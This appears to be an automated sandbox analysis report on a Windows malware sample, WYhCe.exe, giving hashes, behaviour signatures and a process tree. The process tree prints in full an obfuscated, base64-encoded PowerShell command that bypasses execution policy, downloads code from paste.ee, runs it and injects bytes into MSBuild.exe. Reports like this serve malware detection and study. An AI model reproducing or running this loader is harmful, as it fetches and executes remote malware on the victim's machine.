Analysis
-
max time kernel
129s -
max time network
97s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
07-07-2020 13:12
Static task
static1
Behavioral task
behavioral1
Sample
WYhCe.exe
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
WYhCe.exe
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
WYhCe.exe
-
Size
103KB
-
MD5
c2337bf726d285b3e59ef7f26f388bca
-
SHA1
5b2bfc673012d02f27299db6929a144fd2517f93
-
SHA256
e10c07621cbf12d95bfcb870835c10bbda376fd9e17e49f5caca6b3a3d239bdb
-
SHA512
27e9e92d12658dd6a6e1e710577ea94d8523d3a6f703646007d8d001db9a2b608d314d9e727063207699db9717ed0e2bb77c2a19bae3e79542bec9389c5d2ba1
Score
3/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe 4068 WerFault.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WYhCe.execmd.exedescription pid process target process PID 1492 wrote to memory of 1776 1492 WYhCe.exe cmd.exe PID 1492 wrote to memory of 1776 1492 WYhCe.exe cmd.exe PID 1492 wrote to memory of 1776 1492 WYhCe.exe cmd.exe PID 1776 wrote to memory of 1796 1776 cmd.exe powershell.exe PID 1776 wrote to memory of 1796 1776 cmd.exe powershell.exe PID 1776 wrote to memory of 1796 1776 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4068 1796 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 4068 WerFault.exe Token: SeBackupPrivilege 4068 WerFault.exe Token: SeDebugPrivilege 4068 WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\WYhCe.exe"C:\Users\Admin\AppData\Local\Temp\WYhCe.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start PowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JABIAFAAdgBhAGQASQAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHUAQgBKADEAZgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAEsAcQBNAFkAUQBDAGUAZABMAGgAcwBDAFkARwBpAHMAVgBvAGEATQBYAFAAdwBLAFUAYwBTAHcAdAB6AHgAUQBEAGMAbQBVAG4AaQBYAEEASQB5AG8AdABMAGEAWQBkAGkATgBuAFoAUABUAFUAZQBOAGcATgB0AHQAdwBqAHMAWgBTAHQAbABnAFEAQQBGAGcAbQBhAEcAUQBWAHEAZwBEAFcAWgB5AFgAUQBEAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASABpAFMANgBpACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqACkA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JABIAFAAdgBhAGQASQAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHUAQgBKADEAZgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAEsAcQBNAFkAUQBDAGUAZABMAGgAcwBDAFkARwBpAHMAVgBvAGEATQBYAFAAdwBLAFUAYwBTAHcAdAB6AHgAUQBEAGMAbQBVAG4AaQBYAEEASQB5AG8AdABMAGEAWQBkAGkATgBuAFoAUABUAFUAZQBOAGcATgB0AHQAdwBqAHMAWgBTAHQAbABnAFEAQQBGAGcAbQBhAEcAUQBWAHEAZwBEAFcAWgB5AFgAUQBEAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASABpAFMANgBpACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqACkA3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 7164⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1776-0-0x0000000000000000-mapping.dmp
-
memory/1796-1-0x0000000000000000-mapping.dmp
-
memory/1796-2-0x0000000000000000-mapping.dmp
-
memory/1796-4-0x0000000000000000-mapping.dmp
-
memory/1796-5-0x0000000000000000-mapping.dmp
-
memory/1796-6-0x0000000000000000-mapping.dmp
-
memory/1796-7-0x0000000000000000-mapping.dmp
-
memory/1796-8-0x0000000000000000-mapping.dmp
-
memory/1796-9-0x0000000000000000-mapping.dmp
-
memory/4068-3-0x0000000004A10000-0x0000000004A11000-memory.dmpFilesize
4KB
-
memory/4068-11-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB